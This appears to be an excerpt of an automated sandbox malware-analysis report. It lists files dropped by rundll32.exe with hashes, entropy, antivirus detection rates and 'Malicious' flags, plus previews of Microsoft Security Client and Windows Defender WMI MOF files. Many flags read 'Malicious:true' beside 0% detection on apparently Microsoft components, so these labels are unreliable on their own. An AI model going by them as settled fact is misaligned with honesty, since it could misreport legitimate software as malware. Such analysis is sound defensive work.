                                                                            Preview:// ClientWMIUninstall.mof : ..//..// Copyright (c) Microsoft Corporation. All rights reserved...//..// This file will be processed by MOFCOMP utility to..// install Microsoft Security Client classes to the WMI repository..//....#pragma autorecover....#pragma namespace("\\\\.\\root\\Microsoft")....instance of __Namespace..{.. Name = "SecurityClient" ;..};....#pragma namespace ("\\\\.\\root\\Microsoft\\SecurityClient")....class Win32_ProviderEx : __Win32Provider..{.. [.. Description("Hosting Model, provides compatibility with Windows XP and Windows Server .NET. Do not override."),.. Override("HostingModel").. ].. string HostingModel = "LocalServiceHost";.. .. [.. Description("..."),.. Override("SecurityDescriptor").. ] .. string SecurityDescriptor; .. .. UInt32 version = 1;..};......[.. abstract: ToInstance, .. Description("This is a base abstract class that might be serialized to XML"): ToInstance ToSubClass..]..class Seria
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):296280
                                                                            Entropy (8bit):6.091659225748971
                                                                            Encrypted:false
                                                                            SSDEEP:6144:0WEUBaI5gV/c/JjDX8lv/FJlo3zMfPoL4qpBW/7DZe/pS:1VoVkhjDXS/rK4qpAFe0
                                                                            MD5:828221391F701B2CD7D1BF772A5B369E
                                                                            SHA1:E3C6679E9AA43B0A92841E36B4B2352599AA3437
                                                                            SHA-256:545F9356969C1D50E6FA0DEF359900F84553A7FDA29EDC55693CDE8B399E52BB
                                                                            SHA-512:988F7FA7A802A97C63D4AFA0D71434666179A7B73EA778332F4A77201551129F23B3C214526FA296C8B6BD688325044AFC734929E1AA94E4E58C79976F7FB14F
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):328976
                                                                            Entropy (8bit):6.198120164117354
                                                                            Encrypted:false
                                                                            SSDEEP:6144:xNnWg5R+apw+X7RUi7ugdjklyi7mjSaO8xm6j2n:rWg5R+apw+X7iSJdjklyi7mjSt8Vjm
                                                                            MD5:86C84739AE8836EDADC2631B7D59F29B
                                                                            SHA1:0370932E18368A169C1A84A3F86A305016BA6AF0
                                                                            SHA-256:7AF5A25F7991926C507FA1DDC56639E0242FCB4CBD1E4667EE660E52FE824BA6
                                                                            SHA-512:ABC7E228A1A2C2C48025F40544CF4C79FB044864DB760146886A08234F3212FFE14B7E3E3B5094FC1036444C5E9D5C3C4F28DA1B7D80822A1931BC65ED221773
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1070440
                                                                            Entropy (8bit):5.101220702530903
                                                                            Encrypted:false
                                                                            SSDEEP:6144:JmiTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVVtVVWV60jVLVVOVVUVZVVVVVjVVJZ:L/6qa37LS
                                                                            MD5:DD23543F34BBF0FB213A9B94EEAD88C6
                                                                            SHA1:0D86ACF88053E92C148246DBEC2ED57C5873D103
                                                                            SHA-256:11E886100FCCE403D98866CDF32A9DE5FE010DFC092B17B0A05D2598C6822CF8
                                                                            SHA-512:D87B4D7F309F2B0F6FE16803B32BCD6FD053482C705194AB0A93AB341232052AE35DEA60B34166ADB3E81F7E11685FA890AF3F8EB14C14D5159E2C30DD017E0B
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:C source, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):361
                                                                            Entropy (8bit):4.8940836129092675
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            Preview:// FepUnregister.mof : mof source for namespace unregisteration..//..// Copyright (c) Microsoft Corporation. All rights reserved...//..// This file will be processed by MOFCOMP utility to..// unregister the provider with the WMI repository..//....#pragma namespace("\\\\.\\root\\Microsoft")..#pragma deleteinstance("__Namespace.Name='SecurityClient'", nofail)..
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):210272
                                                                            Entropy (8bit):5.230229920969571
                                                                            Encrypted:false
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1418512
                                                                            Entropy (8bit):6.2264061869732945
                                                                            Encrypted:false
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):326144
                                                                            Entropy (8bit):6.363935428300735
                                                                            Encrypted:false
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: Virustotal, Detection: 10%, Browse
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):25780559
                                                                            Entropy (8bit):1.5346278972151863
                                                                            Encrypted:false
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Virustotal, Detection: 3%, Browse
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):925848
                                                                            Entropy (8bit):6.085579436536139
                                                                            Encrypted:false
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):353552
                                                                            Entropy (8bit):6.063609490596869
                                                                            Encrypted:false
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):165560
                                                                            Entropy (8bit):5.404976368456962
                                                                            Encrypted:false
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):165136
                                                                            Entropy (8bit):5.919968753776253
                                                                            Encrypted:false
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):103672
                                                                            Entropy (8bit):5.463582216147117
                                                                            Encrypted:false
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):373224
                                                                            Entropy (8bit):5.820010710818714
                                                                            Encrypted:false
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):144728
                                                                            Entropy (8bit):3.894814306787259
                                                                            Encrypted:false
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):496912
                                                                            Entropy (8bit):6.014056505362478
                                                                            Encrypted:false
                                                                            SSDEEP:6144:UTmg/KSnLsE0aGPrR4IcdwSbttHRqJULrf6KmiTVVmVVV8VVNVVVcVVVxVVVPVVQ:UxSrR4Ic7bttxqJULrTj
                                                                            MD5:82D45EE8BCA40389EA79879C75EC6207
                                                                            SHA1:86108949630649367EA91153EEE86F2FDC9F2489
                                                                            SHA-256:CE0B09D43134DD41BA555AAF18DD491EC610DD503864CAF7BFFF60AFB73F8ED5
                                                                            SHA-512:8E03CC2B53635BBA4D3AB21946C20D91B8387BE0FDEF700A893104AD5153CAF2632A1D51766DEBCA6A05C35F15B40F08A20EE52FD154938D930406C0A8F354EE
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):202072
                                                                            Entropy (8bit):5.957890458465426
                                                                            Encrypted:false
                                                                            SSDEEP:3072:H/5F5VF0f8aKwRRw9XOfCAbP+A+TQ3KTeWxFYapr7Du2pe:H/5Fp0fThRRw9+fCAldmFYMpe
                                                                            MD5:4987F9EFD8B2E414801BB322400D2BFD
                                                                            SHA1:A1AAA1743D7927D667EDC74A36B1A8EFF5FE2470
                                                                            SHA-256:08789F41E50D75EADBDF097494D9AD66B26FED684501E99B5E219CA7FDE0489D
                                                                            SHA-512:FFDCEE1706AE0E02D8E79D3775EEF40E86B331CE186EEB0BB897ACF70AB85260C2AED15DBAA3AD93161A159202D1004A149A30573D5CC83AE249A3DEE17C4CBF
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1619192
                                                                            Entropy (8bit):6.3400930707756755
                                                                            Encrypted:false
                                                                            SSDEEP:24576:uLLxAt3sZG5yM+SrnrwrTqfb8BPVEGAUFSCJMb1ierG:ko8ZGk8nEqfoBPqdUFrMb1ieq
                                                                            MD5:59CD6F03A00980D8ADBF42EFBB9FFFD8
                                                                            SHA1:F5471A156DDDC69799782E3FE0D72FD6E8D0F085
                                                                            SHA-256:A6D588A8EC27E9294C52BA9ABE5DD1FC7C99E129B7CAF9C19F39FF6ECA236B0A
                                                                            SHA-512:49D69D9C19342985B0E520868F7745A4B515EF2EC5778372E266978A9FE690BC3BEF37CB0CA2B513D829B82D92A4D04C8143B594ABF83A3082B86324EE6B0A8E
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):3282192
                                                                            Entropy (8bit):6.315630312982859
                                                                            Encrypted:false
                                                                            SSDEEP:98304:rGo+pTlHiqauRMwGM2CEwCaCEaC3CE8CYPpCGnCqCEPCBCEPCjY:rGo+pTlHiqP/G7Y
                                                                            MD5:3767B51F5D134FD6A459F2F30C87ED14
                                                                            SHA1:33DEC014E1CB9A3B6BF4F3D037935C3E7E39904A
                                                                            SHA-256:203E41C2321D802387381D4F003EA49884A0CA0BF61ADF7D103992B0D529932C
                                                                            SHA-512:7E5AE6E6BC9E5E9A70E5A1C3B37707EDB6CE62266B59AD452E2A2F27008BA0F51661E46095130DBD04CA62C7E10F087B51F6D41FDA04CB19D0A806FE2D4A581B
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):107880
                                                                            Entropy (8bit):5.399183517403788
                                                                            Encrypted:false
                                                                            SSDEEP:3072:/+V443d04OzmE9ww+vKTebKJy5zeWKGo3:/+V443d05n9rwKw5zNQ
                                                                            MD5:5020E4A4321476F7DE557F75CBC87438
                                                                            SHA1:6F135DE3D7A2FF90AF6401E5C01FCC282B0A4108
                                                                            SHA-256:41E3B40B6B8472380568BCF75FB493515DBAF63BF948F9DA9267F459D422F78F
                                                                            SHA-512:7AA722B45373F82F5ED8F6559D149E3DD72A00CB942D39BA2B0F584FF6FABFB62B1A0A52195298389CB2C698DA4E62F2D78DDE2DF46FF1183BA0F2118A2297C5
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):128376
                                                                            Entropy (8bit):5.778415627793409
                                                                            Encrypted:false
                                                                            SSDEEP:3072:svVXrm01KTBVOm81W0z3J8EfKTee1YzFw/x65B:svBjiBVOmGJJ0kFaw3
                                                                            MD5:2C2714BAB4E11FD6865DDF8B501A212D
                                                                            SHA1:9B5D52CB7A6CF62B83A36566DEAD2C28B0D1A96E
                                                                            SHA-256:0C60E5D6BB49E1F85DEA4305BCB2308708A11A8A2C228D0C1F3F41BE79AF09C2
                                                                            SHA-512:73ECA7073D9ECB8015C23E494D948C1D50A32CF96D2E0190D08FD48A69F725DCE35D2A6506FAF037FB42405A55DBF22A7776068BD30811721AC086C04A65001C
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):21776
                                                                            Entropy (8bit):4.731417909543677
                                                                            Encrypted:false
                                                                            SSDEEP:192:7rFQWgZHWAALc2Fu462TNbvRpSDBQABJw5Wayks9gICQX01k9z3AbwmN:7rFQWgZHWA1MJ16DBRJwLy/P/R9zlmN
                                                                            MD5:0613DECA278E353EBC96493895754CCE
                                                                            SHA1:D72682AE6E077DE106235D9C236B2C7F744E2DBC
                                                                            SHA-256:D84E4315C6121FA8F8D4D477FF8C70AC899EC29CF7EE10CCD1BE1A01E7E57D9E
                                                                            SHA-512:275A7A398EA6DA4284489C437D8EB0FFA3C7FEAA299235AF92CF3E8AFB78E5487337F4B5C7544C9CFBC2AAE90BAEFDF02417C6E9125BE8BA98902464AD766CD9
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):21856
                                                                            Entropy (8bit):4.482734780628967
                                                                            Encrypted:false
                                                                            SSDEEP:192:nrWNzOWPicCroDBQABJ54pZMMBdRgjLX01k9z3AzslM1Y3qq:rWNzOWPbDBRJGTleLR9zusloYZ
                                                                            MD5:9EEE260CF0F752D4595E51AF7EBD8B6A
                                                                            SHA1:1544C414D1240AC4F8FED45551EA061CD4665721
                                                                            SHA-256:49FA47F6F2444DC2235813961ED8395D04F86B9DF3EA08882BFFED4EAD3502F4
                                                                            SHA-512:27EDB26E104294A9DB70A4B58930220694E877DF808D4838DBDC2516BAEB5BF996C759446BE18855F52D424CDB3B5BFDD26B64B087AF167ABD661FC7C5CAEE17
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):2909208
                                                                            Entropy (8bit):6.442167136448819
                                                                            Encrypted:false
                                                                            SSDEEP:49152:LJlKh3CsTiIy0vAayl+xFJCPg3gUZ/RG6XICg:DIPlIn
                                                                            MD5:852AAE2F9F2F13FD6AECC1E1817D8BF1
                                                                            SHA1:548C65353A1A7ACFA4CCF72F94571FEEB533AB44
                                                                            SHA-256:6BFE5B785D96525C9F060474837A83434E9EEAB498A07396C5EDB7EA925BF8B9
                                                                            SHA-512:3A7F1D8FD4D0D779383697632E3B00B803E510719AA80130337EFA7C6AB94418C3DD1315B866D4E9B2F4028777DE1229B1BD8057129C89D2778DEF1F465F95D2
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):738576
                                                                            Entropy (8bit):6.022878886310737
                                                                            Encrypted:false
                                                                            SSDEEP:12288:iQo3VmVdaveWcQRUtwywRXT349/gehVTef1YecoFW3h07EVd:U4VdamQRamXGef63ou0EVd
                                                                            MD5:CFC96445CC630E00935A8A74875BD45C
                                                                            SHA1:5572055932156EA9F569ACB1CFC0E714373765D6
                                                                            SHA-256:D132DE7BFAFDA6F0A9CFA4A829892FBA6C531D721C4A1BA9918BD5553BA0336B
                                                                            SHA-512:92E737A59BE464ADB5152C4406E76578CC70FECE2E58EAA845A654A1A70BBDBF7EB57B3079179C8666944111FEEB59E3D54F0CDC61B7F5639BEC62D31B851B46
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:C source, Unicode text, UTF-16, little-endian text, with very long lines (4929), with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):94958
                                                                            Entropy (8bit):3.592146871128743
                                                                            Encrypted:false
                                                                            SSDEEP:768:hvQJc7QeBhFbUAbYzlyZCvQJc7QeBhFbUAbYzlyZg:uMbgyLMbgya
                                                                            MD5:4B23206905E11134BEB571548C245F3C
                                                                            SHA1:3E0AE50991CD2422E1C2FDCC9C6F6DF8EAB18FEC
                                                                            SHA-256:2CF7F8EF415A75427E90C50BC18BF5FBE25398A3E805A08F0DA5DEEB48C7CCA1
                                                                            SHA-512:9A758F7C1BC185EDE944CDC6A12B2664F5A1EBC31623FE40C469E317199D5A93E8CCB786042C4012D3ED3D57E271C853D60019D516BA399430ACEBD4BE938E5D
                                                                            Malicious:false
                                                                            Preview:
                                                                            #pragma autorecover
                                                                            #pragma namespace("\\\\.\\root\\Microsoft\\Windows\\Defender")

                                                                            Instance of __Win32Provider as $prov
                                                                            {
                                                                              Name = "ProtectionManagement";
                                                                              ClsId = "{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}";
                                                                              ImpersonationLevel = 1;
                                                                              HostingModel = "LocalServiceHost";
                                                                              version = 1073741825;
                                                                            };

                                                                            Instance of __MethodProviderRegistration
                                                                            {
                                                                              Provider = $prov;
                                                                            };

                                                                            Instance of __EventProviderRegistration
                                                                            {
                                                                              Provider = $prov;
                                                                              eventQueryList = {"select * from MSFT_MpEvent"};
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:C source, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2664
                                                                            Entropy (8bit):3.464075447819169
                                                                            Encrypted:false
                                                                            SSDEEP:24:QXbclfUWvlDQzj3WvlDQzCWvlDQzwNWvlDQzYTYWvlDQzSJjWvlDQzfWvlDQzyWU:eTjDGwJ3SJnr24RFZ7a2la2Sa2mWaWP
                                                                            MD5:C4E26C53F76774E091FEE17FFFF64414
                                                                            SHA1:5CB3AD07CF6DFF3DB5BAAD55488A769A664BC093
                                                                            SHA-256:5172863C41E84024799B2034D42F10E9720FC53171A4F6C1CA2FDB2C6F71DFE9
                                                                            SHA-512:635DE182629A248B9BF3061E1A1C1D3ED904B8843187B64CEB3BF96DD4B10769D9E001EAEECED2179350F7012C82317B2C833A8501FF9C92D1A0CE94C711FEBB
                                                                            Malicious:false
                                                                            Preview:#pragma namespace ( "\\\\.\\root\\Microsoft\\Windows\\Defender")....#pragma deleteclass("MSFT_MpComputerStatus",nofail)..#pragma deleteclass("MSFT_MpEvent",nofail)..#pragma deleteclass("MSFT_MpHeartBeat",nofail)..#pragma deleteclass("MSFT_MpPreference",nofail)..#pragma deleteclass("MSFT_MpRollback",nofail)..#pragma deleteclass("MSFT_MpScan",nofail)..#pragma deleteclass("MSFT_MpSignature",nofail)..#pragma deleteclass("MSFT_MpThreat",nofail)..#pragma deleteclass("MSFT_MpThreatCatalog",nofail)..#p
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):165208
                                                                            Entropy (8bit):7.110142692986595
                                                                            Encrypted:false
                                                                            SSDEEP:3072:vMxVQoQqFTs8U+Nwy8bhpgENIf5eeT25+h6+iU:v8s8tNwZhpgEKfEeT6m
                                                                            MD5:EBEA28C15DD26C1D0C1944215F0AAE8B
                                                                            SHA1:98375B311B8D56DA260961217073B30D1AEFE089
                                                                            SHA-256:E36CD8ABDA4C1E71C9E322550ECD3F6B76B1D6ACAD014F7DFA11F72A0ABC674B
                                                                            SHA-512:05E17C27A257229BD67096D0E2858C9A120293983F8F79AA9A884F97A4F867A00AD1ED7DEC846EC54F236B44802B7A6C57E752B81277510B90F930BDB6714F11
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):403816
                                                                            Entropy (8bit):6.1451106536127735
                                                                            Encrypted:false
                                                                            SSDEEP:6144:z9eW9BpN1rKvfwOlWQb1MfMp7ZFfyjCrplIz5qyAlhAXnWPkzfo:zDKv4OlWQpMA7Z0Cr/e89QnWszfo
                                                                            MD5:FBAA9986931D1ADEDA07A6EF8F04AB6D
                                                                            SHA1:5FB959351940EB94EEF9D8E21D95436B77FEB9A2
                                                                            SHA-256:3B96D206B1BF06532440E2DD91B615A6CC8DD21561C252449F3B76FC254E11DF
                                                                            SHA-512:A88A56E30BEBF91CDB1382F46E2D095CBD20CA6ACDFBEF1998602AB7C744E6DECB6D80885CCE3CE1F97EBCBBDC5F90A6B192D8BE9C08DD4A2FC95F10AB2CC102
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):25936
                                                                            Entropy (8bit):4.328275985676387
                                                                            Encrypted:false
                                                                            SSDEEP:192:9+DWgAHWglQBEKLO0cCroDBQABJFI6eYIN5vCX01k9z3AzfSXDlG6P:cWgAHWtBEJlDBRJeWUJCR9zUwDM6P
                                                                            MD5:4A8B58C88DF1C607A9DF21EE390CA8F8
                                                                            SHA1:18B995CA90D74D34975F9DF8E8611F35E7B94E9D
                                                                            SHA-256:1A90C01C3FD40E5CEE77F626BF9883B5D276132252E28EE4B6C2C02D9CD30E4C
                                                                            SHA-512:1ECCD6FB016C7E43FBE63120A2A43135B17453AF428658E11EFD69F753FEE5A5F227202144CE85840388E138D392F0A528450B37DE23EFE902CC467A5CD4F1DA
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):587096
                                                                            Entropy (8bit):5.955146470563534
                                                                            Encrypted:false
                                                                            SSDEEP:6144:UoSVOVSccnel+Z/smH98qn3xVPNCqdeAB5l6Hv7YPdr5/NJSFiimiTVVmVVV8VVp:ULOVSpu+Viq3xnJdtn6jUFYNN
                                                                            MD5:2776A2B1C9D82F3FEBAA8CA1F5544992
                                                                            SHA1:28620B6498EEFA4E411686FEAC1C0E03D66B661D
                                                                            SHA-256:D1F81D7C43B522E39F0FD14E1C25F97E7894CEBBE1F43320CBB66BE1528A7A72
                                                                            SHA-512:2FBCA83415F5E927B38DBF7064CAAE1CD67EC2ACBA6C00AEB3520F9C8BC3B9DE46329CB57B2D1D9DC7CB33BD89766E6C8C3DC3C1FC6B3DAA885CB50FE64C5E2B
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:ASCII text, with very long lines (467), with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1091
                                                                            Entropy (8bit):4.900567214358779
                                                                            Encrypted:false
                                                                            SSDEEP:24:8uSJLsnMRsAvARsADXWBDk44IuNhbgU0E+4HQk1LpsLtbY:89LsnMRsgARsqXWBDB4Tvr06H319ou
                                                                            MD5:314CE81BED1547B8FA40F405F4C8B9FC
                                                                            SHA1:6A1A717B275B90BA77A43EF77FCDEDBC7E6F7CE2
                                                                            SHA-256:00D799DC04FBDF92BC39218C22723C61C3204A82B1FC418E6AEA65E6ED111CE8
                                                                            SHA-512:143A0D92659BB088F2282BDB14F465D58EA9E0E57D261741CC9AC7B507BE730F4B0A62E9A9BF0B73BF19FDF6F44F2977E2C77875E28AC30E461155BDDB59A047
                                                                            Malicious:false
                                                                            Preview:Files originating with or related to Casablanca v2.6.0, a "Microsoft project for cloud-based client-server communication in native code using a modern asynchronous C++ API design. This project aims to help C++ developers connect to and interact with services." See https://github.com/Microsoft/cpprestsdk. This material is licensed under the terms of the Apache Software License v2.0 (see https://github.com/Microsoft/cpprestsdk/blob/master/license.txt), which state:.... ==++==.... Copyright (c) Microsoft Corporation. All rights reserved. .. Licensed under the Apache License, Version 2.0 (the "License");.. you may not use this file except in compliance with the License... You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0.. .. Unless required by applicable law or agreed to in writing, software.. distributed under the License is distributed on an "AS IS" BASIS,.. WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied... See the License for
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):142
                                                                            Entropy (8bit):6.55447018279355
                                                                            Encrypted:false
                                                                            SSDEEP:3:DfVjzD2ZzXgE4dXC/FiYvyfgaPDlZqLDpVYngGbu/6Ry0s9rYdn:hnDEgRdSZEg8YDp1ERy0OAn
                                                                            MD5:57A37BD0840D0745A9481BCC25B5A792
                                                                            SHA1:E8B7C744981C0713DE5EBB308897EFCBD374FD11
                                                                            SHA-256:E2B2371F95D8D9CBFCA301AFF3441466E30453BBD37A42FA17DAF4D85AA7E627
                                                                            SHA-512:08AFA751874B49FB20ADBEC0C824609DAE0DECD6E747471EF8CB19FAE299A65D21ACC02185560669ED9E36CD74E2E4372B61E52EEF34D5785E9BBA3DC8FD431B
                                                                            Malicious:false
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):2560
                                                                            Entropy (8bit):3.2580418248791343
                                                                            Encrypted:false
                                                                            SSDEEP:24:eH1GSp85gpXsFCZIN/at1IyBIZW0sTf5cnaw7ScNffz745U35WWdPfPN3Tc:ypK2BZ+W1I8IZWPTf5EdHffA5K5Ww13g
                                                                            MD5:EE08DF3A08F49B9A7239F0DE796E5DD0
                                                                            SHA1:461A532C71E6C20FB529F340CDF89DB4845200AF
                                                                            SHA-256:5959174D18270B856CF01B69223623E231AEF539F71B20336E0BE764F4C632F5
                                                                            SHA-512:7E6274FB38113EF69B132C5687EC4E08FFD09A4C1CA85B82441470D20AABBB55814E97EF8EE6DFA08A377719FB71ABA6A94F1217554C3463173AF12F93038222
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):50688
                                                                            Entropy (8bit):3.394595207496583
                                                                            Encrypted:false
                                                                            SSDEEP:768:QJbyt33c7EhrdTTm147vXahEzhEthEGQRQwhEfSm:QJbytHu6rdd7vM+4Ivm
                                                                            MD5:4CFEF0FE4901B062F4B169B97F8CFD31
